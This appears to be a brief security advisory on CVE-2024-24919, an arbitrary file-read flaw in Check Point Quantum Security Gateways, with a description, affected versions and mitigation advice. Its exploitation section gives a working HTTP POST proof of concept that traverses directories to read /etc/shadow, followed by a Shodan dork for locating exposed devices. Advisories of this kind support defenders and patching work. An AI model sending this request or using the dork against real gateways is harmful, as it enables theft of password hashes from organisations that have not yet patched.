CVE-2024–24919: Critical Vulnerability in Check Point Quantum Security Gateways

Vulnerability Description

CVE-2024–24919 is a critical vulnerability identified in Check Point’s CloudGuard Network Security appliance. This vulnerability allows an attacker to read arbitrary files on the affected system, which can lead to significant data exposure. The issue is particularly critical for systems connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. Exploitation of this vulnerability could grant unauthorized access to sensitive information, such as system password hashes.

Affected Versions

The vulnerability affects multiple versions of Check Point Quantum Security Gateways. Specific versions impacted by this vulnerability include, but may not be limited to:

• Check Point CloudGuard Network Security appliance versions prior to the latest security patch.
• Systems with remote Access VPN or Mobile Access Software Blades enabled.

It is imperative for users to consult Check Point’s advisory to determine the precise versions affected and to apply the necessary updates.

Exploiting CVE-2024–24919

The vulnerability can be exploited by sending a specially crafted POST request to the /clients/MyCRL endpoint. Here is a proof of concept (PoC) demonstrating the exploit:

POST /clients/MyCRL HTTP/1.1 
host: target 
Content-Length: 39 

aCSHELL/../../../../../../../etc/shadow

This request attempts to perform directory traversal to access the /etc/shadow file, which contains sensitive system password hashes.

Shodan Dork

For those seeking to identify systems vulnerable to a related exploit, CVE-2024–24919, the following Shodan dork can be utilized:

title:"Check Point" ssl:"target"

Using this dork, security professionals can locate potentially vulnerable devices exposed to the internet.

Mitigation and Recommendations

Check Point has released a security fix to address CVE-2024–24919. Users are strongly advised to apply this fix immediately. Detailed instructions and mitigation steps can be found in Check Point’s advisory here.

In Conclusion

CVE-2024–24919 represents a significant security threat to organizations using Check Point Quantum Security Gateways. Immediate action is required to apply the security fix provided by Check Point to prevent potential exploitation and data breaches. Regular updates and patch management are crucial in maintaining a secure network environment.